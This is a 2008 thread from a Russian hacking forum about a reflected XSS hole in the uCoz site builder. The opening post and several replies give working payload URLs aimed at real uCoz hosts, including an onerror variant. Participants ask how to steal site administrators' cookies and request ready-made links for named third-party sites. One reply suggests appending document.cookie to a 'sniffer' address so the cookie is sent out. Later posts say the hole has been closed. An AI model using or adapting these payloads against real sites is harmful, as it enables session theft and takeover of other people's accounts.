Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Ucoz xss (https://forum.antichat.xyz/showthread.php?t=98425)

foopi 28.12.2008 22:39
Ucoz xss
 
Вот xss найденная мною на юкозе:
Код:
[site.ucoz.ru]/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3E
Пример:
Код:
http://cat.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3E

-m0rgan- 28.12.2008 22:57
Ыыыыыыы))))
Юкоз пахекали=)))
Код:
http://www.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3E
:D:D:D
Малаца, держи канфетко=)

foopi 28.12.2008 23:13
Цитата:
Сообщение от DVD_RW
yje prikrili??? lol
неправда всё работает)

DVD_RW 28.12.2008 23:14
В ФФ не пашет

-m0rgan- 28.12.2008 23:18
В Опере все гуд!

k0lbasa 28.12.2008 23:21
пробел надеюсь не забыл убрать, двдрв?)

DVD_RW 28.12.2008 23:24
ога..под ие6 пашет...под фф не хочет ^_^

m0sk 29.12.2008 03:56
гут

Xcontrol212 29.12.2008 04:53
ff не пашет,на ие 5 и опера 9.62 пашет!

o3,14um 29.12.2008 06:05
давайте мот перенесём в приват))

Sasuke-kun 29.12.2008 22:05
Уже не пашет =(

-m0rgan- 29.12.2008 22:39
Sasuke-kun, че у тебя не пашет???)
Все там пашет!!!111адинадинадин
Пробелы убери прост :D:D:D

Arigona 29.12.2008 22:57
дайте пример на сайт prostota.ucoz.org, уж очень хочется посмотреть, а то смотрю и не пашет(

Arigona 29.12.2008 23:00
всё, понял, а как с ней увести пароль как то можно? снифером трудно будет

-m0rgan- 29.12.2008 23:07
Пробуй так:
alert(адрес снифера+document.cookie)

Chrome~ 29.12.2008 23:09
Реально. Автору зачет.

Sasuke-kun 29.12.2008 23:19
хм..а у меня не пашет,можите дать готовый пример например к сайту naruto-fan.ru он на ucoz'е

Chrome~ 29.12.2008 23:27
Для Mozilla Firefox, Opera и некоторых других браузеров успешно работает такая конструкция:

Код:
http://cat.ucoz.ru/admin/ghckh.php?sape_keys="><img src="a"onerror=alert("XSS")>

Alexandr II 29.12.2008 23:39
всё пашет и пашет нормально ;) заслужил +

geforse 30.12.2008 13:30
уже прикрыли ?(

Chrome~ 30.12.2008 14:02
Все по прежнему работает.

Arigona 30.12.2008 19:30
НО как с этим угнать куки админа ? :(

F1shka 31.12.2008 18:21
молодец, ТС

foopi 31.12.2008 19:30
:( жаль только пользы от этого мало. куки не выходит угнать

luz3r 31.12.2008 19:38
всё работает..

foopi 31.12.2008 21:09
luz3r
И кукисы на снифер приходят?

favor_it 03.01.2009 20:41
Дык я не понял, должна стоят сапа?

dimhee 03.01.2009 20:48
круть , автор молодец

DeepBlue7 03.01.2009 21:12
ЫЫЫЫЫЫЫ ))) Накнецто ХОТЬ ЧТОТО на уцозе нашли и в паб выложили =)

VinTkz 03.01.2009 22:34
кукисы, получилось, у кого-нить угнать? :)

Rehn 04.01.2009 17:30
Крутая у вас, ребят, уязвимость через которую ничего сделать нельзя. Да еще и связанная больше с sape чем с юкозом.

Chrome~ 04.01.2009 19:39
Если правильно написать ссылку, то все получается. Уязвимость нормальная.

miqo 05.01.2009 14:56
можете привести конкретный пример на конкретном сайте?просто мне очень нужно!

P.S. "репутации" нет а то + бы поставил

3dn 05.01.2009 15:11
Цитата:
можете привести конкретный пример на конкретном сайте?просто мне очень нужно!
никто тут не собирается ничего приводить, тут только пустозвонить гаразды.... никто даже не посмотрел что на 404 ошибке в юкозе сапа уже не выводится, а значит некуда лепить эту пассивную XSS....

Еще... Кража кука ничего не даст, его нельзя ни расшифровать ни использовать у себя на компьютере....

Mixon 09.01.2009 15:41
Во всех ваших примерах пишет


Невозможно найти ресурс

Возможно, он был удален, переименован, или временно недоступен.

Chrome~ 09.01.2009 17:10
Цитата:
Сообщение от Mixon
Во всех ваших примерах пишет


Невозможно найти ресурс

Возможно, он был удален, переименован, или временно недоступен.
Уязвимость прикрыли.

Mixon 09.01.2009 17:31
блин((((опоздал(((

Artemik 14.01.2009 18:41
Да реал, краша куки вам ничего не даст. По умолчанию на Укозе у админа стоит привязка к IP. А следовательно куки если и прилетят, то толку от них нет.

Пётр 23.01.2009 13:44
Цитата:
Да реал, краша куки вам ничего не даст. По умолчанию на Укозе у админа стоит привязка к IP. А следовательно куки если и прилетят, то толку от них нет.
А если у нас динамический IP? Как куки спистеть то?)) Юзал поиск, все темы нечего конкретного... ща работает какой-нить способ?


Время: 22:49